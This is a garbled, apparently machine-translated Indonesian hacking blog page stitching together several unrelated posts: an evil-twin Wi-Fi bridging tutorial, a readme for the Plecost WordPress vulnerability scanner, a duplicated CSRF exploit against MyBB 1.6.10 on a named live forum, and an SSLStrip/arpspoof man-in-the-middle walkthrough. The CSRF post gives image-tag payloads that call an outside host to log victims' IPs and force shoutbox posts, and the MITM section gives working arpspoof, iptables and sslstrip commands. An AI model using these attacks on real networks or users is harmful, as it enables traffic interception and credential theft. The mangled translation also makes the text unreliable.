Sekarang kita perlu untuk menyediakan akses internet ke AP palsu. Hal ini dapat dilakukan dengan berbagai cara. Dalam tutorial ini, kita akan menganggap bahwa kita memiliki x0 antarmuka yang memiliki konektivitas internet. Sekarang, jika Anda terhubung ke net via nirkabel, mengganti x0 dengan wlan1 atau wlan0, modem 3G akan muncul sebagai ppp0. Namun demikian, Anda hanya perlu tahu mana antarmuka menyediakan Anda dengan internet, dan Anda dapat rute akses internet untuk klien Anda.

Interface

x0 - ini memiliki akses internet
at0 - ini adalah membuat oleh pangkalan udara-ng (kabel wajah titik akses nirkabel). Jika Anda entah bagaimana bisa memberikan akses internet ke at0, maka klien terhubung ke jaringan nirkabel palsu Anda dapat terhubung ke internet.
jahat - ini adalah sebuah antarmuka yang akan kita buat, yang tugasnya akan benar-benar menjembatani jaringan.
Membuat jahat
Kami akan menggunakan kontrol utilitas Bridge disediakan oleh Kali, brctl. Jalankan kode-berikut
evilThis addbr brctl akan menciptakan jembatan. Sekarang kita harus menentukan dua antarmuka harus bridged-

brctl addif x0 jahat
brctl addif jahat at0We dapat menetapkan IP untuk interface dan membawa mereka using-

ifconfig x0 0.0.0.0 up
ifconfig at0 0.0.0.0 up juga memunculkan antarmuka jahat (interface tidak selalu up secara default, jadi kita harus melakukan ini berkali-kali)

ifconfig upNow jahat untuk auto mengkonfigurasi semua pengaturan DHCP rumit, kita akan menggunakan dhclient

dhclient3 jahat & Akhirnya, semua konfigurasi telah selesai. Anda bisa menjalankan ifconfig dan lihat hasilnya, yang akan menampilkan semua interface yang telah Anda buat.
Secara resmi, serangan kembaran jahat selesai. Klien sekarang terhubung ke jaringan palsu Anda, dan dapat menggunakan internet dengan mudah. Dia tidak akan memiliki cara untuk mengetahui apa yang salah. Namun, tujuan terakhir tetap.


Bersenang-senanglah
Sekarang klien menggunakan internet melalui antarmuka jahat kita, kita bisa melakukan beberapa hal jahat. Ini sebenarnya berasal di bawah Man In The Serangan Tengah (MITM), dan saya akan menulis tutorial rinci untuk itu nanti. Namun, untuk saat ini, saya akan memberikan beberapa ide yang dapat Anda lakukan.


Sniffing menggunakan Wireshark
Sekarang semua paket yang masuk dari pengguna ke internet melewati keluar antarmuka yang jahat, dan paket ini dapat dipantau melalui wireshark. Saya tidak akan mengajarkan Anda bagaimana untuk menggunakannya di sini, karena itu adalah alat GUI. Anda dapat melihat di situs web mereka untuk mendapatkan ide tentang cara menggunakan wireshark. Pic credits: Gambar di sebelah kanan telah langsung diambil dari situs web mereka.



Special Thanks
To T.I Sniper





Plecost adalah sidik jari kerentanan dan kerentanan finder untuk mesin blog Wordpress.


Mengapa?

Ada sejumlah besar Wordpress di seluruh dunia. Kebanyakan dari mereka yang terkena diserang dan dikonversi menjadi virus, malware atau penyedia porno ilegal, tanpa sepengetahuan pemilik blog.
Proyek ini mencoba untuk membantu sysadmin dan blog pemilik untuk membuat sedikit mengamankan Wordpress mereka.



Apa yang baru?
Versi Plecost 3 ini, menambahkan banyak fitur baru dan perbaikan, seperti:

Tetap banyak bug.
Mesin baru: tanpa benang atau dependensi, tetapi berjalan lebih cepat. Kami akan menggunakan python 3 asyncio dan koneksi non-blocking. Juga mengkonsumsi lebih sedikit memori. Yang luar biasa, bukan? :)
Sistem update CVE berubah dan penyimpanan: Sekarang Plecost mendapatkan kerentanan langsung dari NIST dan membuat SQLite lokal basis data dengan informasi disaring untuk Wordpress dan plugin mereka.
Kerentanan Wordpress: Sekarang Plecost juga mengelola wordpress Kerentanan (tidak hanya untuk Plugins).
Menambahkan database kerentanan lokal queryable. Anda dapat berkonsultasi dengan kerentanan untuk wordpress beton atau plugin tanpa, menggunakan database lokal.
Anda dapat membaca seluruh daftar dalam file CHANGELOG.
Instalasi
Instal Plecost sangat mudah:
$ Python3 -m pip menginstal plecost
Ingat bahwa Plecost3 hanya berjalan di Python 3.

Mulai cepat
Memindai situs web si begitu sederhana:
$ Plecost http://SITE.com

Sedikit kompleks scan: meningkatkan bertele-tele mengekspor hasil dalam format JSON dan XML:
JSON

$ Plecost v http://SITE.com -o results.json
XML

$ Plecost v http://SITE.com -o results.xml

Opsi scan lanjutan
Tidak memeriksa versi WordPress, hanya untuk plugin:
$ Plecost -nc http://SITE.com

Angkatan memindai, bahkan jika tidak Wordpress terdeteksi:
$ Plecost -f http://SITE.com

Hanya menampilkan banner pendek:
$ Plecost -nb http://SITE.com

Daftar daftar kata yang tersedia:
$ Plecost -nb l // Plecost - Wordpress Alat printer jari - daftar kata Tersedia v1.0.0: 1 - plugin_list_10.txt 2 - plugin_list_100.txt 3 - plugin_list_1000.txt 4 - plugin_list_250.txt 5 - plugin_list_50.txt 6 - plugin_list_huge .txt

Pilih wordlist dalam daftar:
$ Plecost -nb w plugin_list_10.txt http://SITE.com
Meningkatkan konkurensi (GUNAKAN OPTION INI DENGAN PERHATIAN. BISA SHUTDOWN DIUJI SITE!)
$ Plecost --concurrency 10 http://SITE.com

Atau ...
$ Plecost -c 10 http://SITE.com

Untuk lebih banyak pilihan, konsultasikan perintah --help:
$ Plecost h

Memperbarui
Versi baru dan kerentanan dirilis buku harian, Anda dapat meng-upload tulisan database lokal:
Memperbaharui database kerentanan:
$ Plecost --update-CVE

Memperbarui daftar Plugin:

$ Plecost --update-plugin

Screenshots






Exploit (?) Mungkin.

Pagi Tadi Nadya and teman Nadya  tidak tahu apa yang harus dilakukan, jadi s4ya mengatakan:
"Mengapa tidak membuat lelucon dari saya dalam gerhana dan Gi0ve?"
(Saya dengan rendah hati meminta maaf) Jadi saya mencoba untuk menjelajah beberapa kerentanan XSS dan CSRF.Questa adalah Pemalsuan Permintaan Cross Site (CSRF), yaitu, untuk membuat korban permintaan ke halaman tertentu atau situs intenzionalmente.Come tidak bekerja?
Dalam hal ini saya menggunakan lapangan
<Img src = "">
Banyak CMS dan Web situs benar-benar tidak mengontrol isi dari src.
Jika MyBB, Anda tidak dapat menyuntikkan javascript atau vbscript
(Es)

<Img src = "javascript: alert (/ XSS /)" />
dan sehingga Anda tidak dapat membuat XSS, namun diperbolehkan untuk melakukan permintaan GET ke CMS atau server eksternal.

Saya mulai menguji CSRF hanya dengan

<Img src = "http://thezero.it/ips.php" />
Dan poof! inilah IP yang menampilkan gambar: http://thezero.it/ips.txt

Dan selain ip logging bisa banyak hal lain (yang mengatakan Biskuit? [Cookie?]).

Tapi kembali ke 'CRF.

Aku tidak ingin melakukan banyak kekacauan jadi saya pikir untuk menulis pesan di ShoutBox.

Saya mencoba untuk menulis pesan di ShoutBox dan saya melihat jenis permintaan ke server

Dua permintaan pada http://forum.frozenbox.org/xmlhttp.php
Sebuah POST dengan parameter pesan shout_data
GET dengan tindakan query = add_shout

Untuk GET tidak ada masalah, hanya parameterisasi URL sebagai berikut

http://forum.frozenbox.org/xmlhttp.php?action=add_shout
Tapi tidak ada tempat untuk POST. (CSRF di quesitone hanya menerima GET parameter)

Jadi, kami mencoba untuk mengubah parameter POST dalam parameter GET.
CATATAN: Bagi mereka yang tahu PHP, jika server ditafsirkan $ _REQUEST tidak peduli jenis permintaan (GET, POST atau COOKIE), maka akan diterima pula.

Mengubah permintaan POST untuk GET link menjadi:

http://forum.frozenbox.org/xmlhttp.php?action=add_shout&shout_data=
Dimana setelah tanda sama akan memasukkan pesan untuk menulis di ShoutBox.

misalnya:

<Img src = "http://forum.frozenbox.org/xmlhttp.php?action=add_shout&shout_data=Messaggio" />
CATATAN: Eksploitasi Hanya bekerja melalui MP, di pos diskusi tidak ditafsirkan HTML, (?)
Tetapi dengan beberapa perubahan yang kami dapat menggunakan ini:
(BB Code, bermain hampir di mana saja di forum.)

[Img] http://thezero.it/ips.php [/ img]
Berikut adalah cara untuk menampilkan gambar korban:
[Gambar: ips.php]

HARAP, JANGAN pisau pada IT.



- (?) TheZeroExploit CSRF MyBB 1.6.10

Exploit (?) Mungkin.
Pagi ini saya tidak tahu apa yang harus dilakukan, jadi saya mengatakan:
"Mengapa tidak membuat lelucon dari saya dalam gerhana dan Gi0ve?"
(Saya dengan rendah hati meminta maaf) Jadi saya mencoba untuk menjelajah beberapa kerentanan XSS dan CSRF.Questa adalah Pemalsuan Permintaan Cross Site (CSRF), yaitu, untuk membuat korban permintaan ke halaman tertentu atau situs intenzionalmente.Come tidak bekerja?
Dalam hal ini saya menggunakan lapangan
<Img src = "">
Banyak CMS dan Web situs benar-benar tidak mengontrol isi dari src.
Jika MyBB, Anda tidak dapat menyuntikkan javascript atau vbscript
(Es)

<Img src = "javascript: alert (/ XSS /)" />
dan sehingga Anda tidak dapat membuat XSS, namun diperbolehkan untuk melakukan permintaan GET ke CMS atau server eksternal.

Saya mulai menguji CSRF hanya dengan

<Img src = "http://thezero.it/ips.php" />
Dan poof! inilah IP yang menampilkan gambar: http://thezero.it/ips.txt

Dan selain ip logging bisa banyak hal lain (yang mengatakan Biskuit? [Cookie?]).

Tapi kembali ke 'CRF.

Aku tidak ingin melakukan banyak kekacauan jadi saya pikir untuk menulis pesan di ShoutBox.

Saya mencoba untuk menulis pesan di ShoutBox dan saya melihat jenis permintaan ke server

Dua permintaan pada http://forum.frozenbox.org/xmlhttp.php
Sebuah POST dengan parameter pesan shout_data
GET dengan tindakan query = add_shout

Untuk GET tidak ada masalah, hanya parameterisasi URL sebagai berikut

http://forum.frozenbox.org/xmlhttp.php?action=add_shout
Tapi tidak ada tempat untuk POST. (CSRF di quesitone hanya menerima GET parameter)

Jadi, kami mencoba untuk mengubah parameter POST dalam parameter GET.
CATATAN: Bagi mereka yang tahu PHP, jika server ditafsirkan $ _REQUEST tidak peduli jenis permintaan (GET, POST atau COOKIE), maka akan diterima pula.

Mengubah permintaan POST untuk GET link menjadi:

http://forum.frozenbox.org/xmlhttp.php?action=add_shout&shout_data=
Dimana setelah tanda sama akan memasukkan pesan untuk menulis di ShoutBox.

misalnya:

<Img src = "http://forum.frozenbox.org/xmlhttp.php?action=add_shout&shout_data=Messaggio" />
CATATAN: Eksploitasi Hanya bekerja melalui MP, di pos diskusi tidak ditafsirkan HTML, (?)
Tetapi dengan beberapa perubahan yang kami dapat menggunakan ini:
(BB Code, bermain hampir di mana saja di forum.)

[Img] http://thezero.it/ips.php [/ img]
Berikut adalah cara untuk menampilkan gambar korban:
[Gambar: ips.php]

HARAP, JANGAN Jadikan pisau pada IT.



- TheZero_Sniper-




Serangan Man In The Middle (MITM).

      Sebuah serangan MITM adalah untuk berdiri di antara korban dan server bahwa korban ingin kontak, tidak mengendus dalam melewati di LAN paket sederhana, tetapi merupakan teknik yang lebih canggih: dalam Man serangan di Tengah, dilakukan dalam sehingga korban percaya bahwa server adalah komputer kita bukan server yang sah, sehingga setiap permintaan akan datang langsung ke kita, maka kita akan dapat membaca dengan benar, mengirimkannya ke server sebenarnya, mendapatkan tanggapan dan mengirim kembali ke pengguna. Keuntungan adalah bahwa Anda akan terus berlayar menyadari segala sesuatu seperti itu berlayar dengan aman di bidang ini kosong percaya bahwa untuk menavigasi, juga kita akan dapat mencegat lalu lintas melalui SSL / TLS (HTTPS misalnya), bagaimana ??

kita menganalisis secara rinci pengoperasian koneksi SSL: kontak pengguna server di bawah protokol aman dengan memulai fase jabat tangan (handshake) yang akan terdiri dalam pertukaran kunci untuk sambungan terenkripsi, koneksi tersebut dienkripsi dengan algoritma kunci ganda, yaitu di mana kunci hanya dapat mengenkripsi pesan dan kunci lain hanya menguraikan pesan dengan dienkripsi dengan kunci pertama. Klien (korban kami), kontak server, server merespon dengan kunci untuk mengenkripsi pesan, pengguna sekarang dapat menggunakan kunci yang untuk mengenkripsi permintaan HTTP dan mengirimkannya ke server, sekarang tidak ada satu tapi server akan tahu apa Ini berisi permintaan tersebut, karena kunci publik bisa mendapatkan siapa pun, tetapi kunci untuk mendekripsi pesan, kunci pribadi, hanya kehendak dan hanya server, maka kita akan memiliki koneksi aman untuk mencoba sniffing. Selain itu, klien, enkripsi permintaan, ia akan juga memasukkan kunci kedua untuk mengenkripsi pesan respon, sehingga ketika server akan memproses permintaan, respon akan cifrarne sehingga hanya klien dapat membacanya, juga tidak ada yang bisa memalsukan respons ini Sebagai satu-satunya kunci untuk melakukannya dienkripsi bersama dengan permintaan bahwa pengguna mengirimkan, kemudian bom-bukti dilindungi oleh kekuatan matematika.

tapi di sini datang keajaiban

dan jika kita menempatkan di tengah? Jika kita memalsukan koneksi dan membuat korban percaya bahwa penyerang adalah server yang sah: korban mengirimkan permintaan jabat tangan penyerang berpikir bahwa basisnya server yang sah, penyerang akan merespon dengan kunci yang valid untuk dirinya sendiri, klien akan mengenkripsi respon melampirkan kunci menikmati, tapi akan mengenkripsi semua dengan kunci dan bukan server penyerang. 1) korban akan berpikir untuk berkomunikasi dalam sambungan aman, yang sebenarnya aman, hanya itu dengan target yang salah. 2) penyerang dapat mendekripsi permintaan dan akan memiliki kunci untuk menciptakan respon yang valid untuk korban 3) penyerang akan membuat sambungan terenkripsi kedua dengan server yang sah 4) ripacchettizza permintaan dari pengguna dan mengirimkannya ke server 5) Server merespon dan mengirimkan penyerang respon 6) penyerang respon ripacchettizza dan mengirimkannya ke korban tidak akan melihat sesuatu yang aneh.

tapi bagaimana menciptakan situasi ?? Anda harus meletakkan tangan berat dalam perencanaan dan fottervi otak, atau Anda mengandalkan alal pap siap ahli besar SSL / TLS yang akan bangkit banyak pekerjaan kotor dari bawah kaki mereka, seperti dalam kasus Moxie Marlinspike, yang menciptakan alat yang didedikasikan untuk situasi ini.

Hal ini SSLStrip, dan mampu mencegat koneksi SSL melalui serangan pembajakan koneksi (serangan MITM yang telah kami menganalisis awal. SSLStrip memiliki operasi yang sangat sederhana, dan melakukan pekerjaan kotor untuk menjembatani antara vittiam dan server, atau untuk menerima permintaan, meneruskannya dan mengirim ulang rispsota, seperti akan proxy, dan jelas memberikan penyerang akses penuh ke isi sesi browsing korban. Alat ini ditulis dalam python dan Anda merasa terinstal pada Bayan Keamanan OS, sistem operasi pengujian penetrasi kami, dengan seluruh bagian yang ditujukan untuk mengendus dan teknik spoofing. ps. dalam hal bahwa beberapa perangkat lunak tidak terpasang, mencoba untuk menginstal paket sslstrip dan dsniff

apt-get install dsniff sslstrip
Nuri kemudian men-download dan menginstal itu (atau menggunakannya dalam hidup) Anda sudah akan memiliki semua yang Anda butuhkan.

Serangan

Kami mengirim kartu jaringan
modus forwarding

berjalan dengan perintah administrasi:


echo "1"> / proc / sys / net / ipv4 / ip_forward
Buka terminal dan pergi untuk melihat all'usage dari SSLStrip:

# SSLStrip h

SSLStrip 0,9 oleh Moxie Marlinspike
Penggunaan: sslstrip <Pilihan>

Pilihan:
w <filename>, --write = <nama file> Tentukan file log untuk (opsional).
p, hanya SSL entri Log --post. (Default)
-s, --ssl Log semua lalu lintas SSL ke dan dari server.
-a, --all Log semua SSL dan HTTP lalu lintas ke dan dari server.
l <port>, --listen = <port> Pelabuhan untuk mendengarkan pada (default 10000).
-f, --favicon Pengganti untuk mengunci favicon pada permintaan aman.
-k, --killsessions Bunuh sesi berlangsung.
h

     Pilihan ini bisa berfungsi w untuk menyimpan output ke file mendengus, tetapi jika kita tidak menggunakan sslstrip akan memberi kita semua output pada terminal, maka kita dapat memilih jenis filter diterapkan antara p (hanya headers koneksi SSL ), -s (semua lalu lintas ssl) dan a (baik lalu lintas SSL yang lampu lalu lintas). -f bukannya memungkinkan kita untuk memalsukan favicon navigasi jika berlayar di bawah SSL, sehingga Anda melihat gembok di sebelah alamat, memimpin dia untuk berpikir bahwa sertifikat keamanan berlaku. Dan tentu saja l akan membantu kita untuk menentukan port yang akan SSLStrip untuk mendengarkan. Kemudian kami mengatur iptables untuk mengarahkan lalu lintas ke HTTP SSLStrip mengetik:

 iptables-t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT -to-port 9000
Kami memulai SSLStrip, questavolta mengetik:

sslstrip -l 9000
N.B. 9000 Anda dapat mengganti dengan port lain yang Anda sukai, asalkan pengalihan iptables sslstrip yang dikonfigurasi dengan port yang sama ini

Kami selesai, kita hanya perlu memulai arpspoof untuk memaksa jaringan untuk mengarahkan lalu lintas ke mesin penyerang. Untuk melakukan hal ini kita membuka terminal lain
meninggalkan terbuka sebelumnya

Dan kita ketik di terminal baru:
arpspoof -i <antarmuka> t <targetIP> <GatewayIP>
Di mana ia akan menempatkan di tempat <targetIP> ip korban dan di tempat <GatewayIP> alamat router. jelas target IP dan router dapat menentukan mereka dengan scan lokal dengan nmap di LAN IP kisaran delal Anda

nmap 192.168.1.1-254
ps. Beberapa router memiliki ruang yang berbeda dari IP dan disesuaikan segalanya untuk kebutuhan Anda, seperti 192.168.0.1-254 dll Pada titik ini, script akan mulai bekerja sesuai dengan prosedur yang disebutkan di atas dengan menangkap akses data. Jika anda ingin mencegat SSL ltraffico, hanya mengatur iptables port 443 bukan 80

 iptables-t nat -A PREROUTING -p tcp --destination-port 443 j REDIRECT -to-port 9001
Dan bersenang-senang dengan SSLStrip di pintu redirect baru.

sslstrip -a -f -l 9000 w /root/Desktop/sniff.log
1) arpspoof mengolok-olok korban menyebabkan dia untuk menghubungi penyerang untuk setiap permintaan, 2) / proc / sys / net / ipv4 / ip_forward akan dibentuk untuk menerima IP forwarding 3) iptables akan mendengarkan pada port 80 443 dan mengarahkan lalu lintas di pelabuhan lokal 9000 dan 9001 4) SSLStrip jika dimasukkan mendengarkan pada 9000 akan mencegat semua lampu lalu lintas, sedangkan 9001 semua lalu lintas dienkripsi Berharap kami juga bisa mengatur untuk iptables membajak kedua protokol pada port yang sama untuk mengelola semua dengan sesi unik SSLStrip, tapi saya pribadi lebih suka untuk mengelola secara terpisah. Bersenang-senang mencoba teknik pada komputer Anda sehingga Anda menyadari betapa berbahayanya adalah teknik ini, dan ingat bahwa arpspoof hanya bekerja di LAN Anda, kemudian serangan eksternal pertama harus digunakan untuk server DNS korban yang diarahkan domain tertentu untuk Anda, membunuh Anda untuk melakukan port forwarding, dan banyak gadget lainnya untuk fungsi serangan benar. Saya mengingatkan Anda bahwa artikel ini adalah untuk informasi saja dan hanya mencoba sistem dan lingkungan atau properti Anda atau Anda mendapat izin tertulis yang mengotorisasi pengujian teknik tersebut untuk mempelajari mereka dalam operasi atau untuk menguji untuk keselamatan. Blog ini, jaringan yang terkait dengan mereka dan anggota tim mereka yang bekerja di sana tidak bertanggung jawab atas penyalahgunaan teknik tersebut.


MKRdezign

Formulir Kontak

Nama

Email *

Pesan *

Diberdayakan oleh Blogger.
Javascript DisablePlease Enable Javascript To See All Widget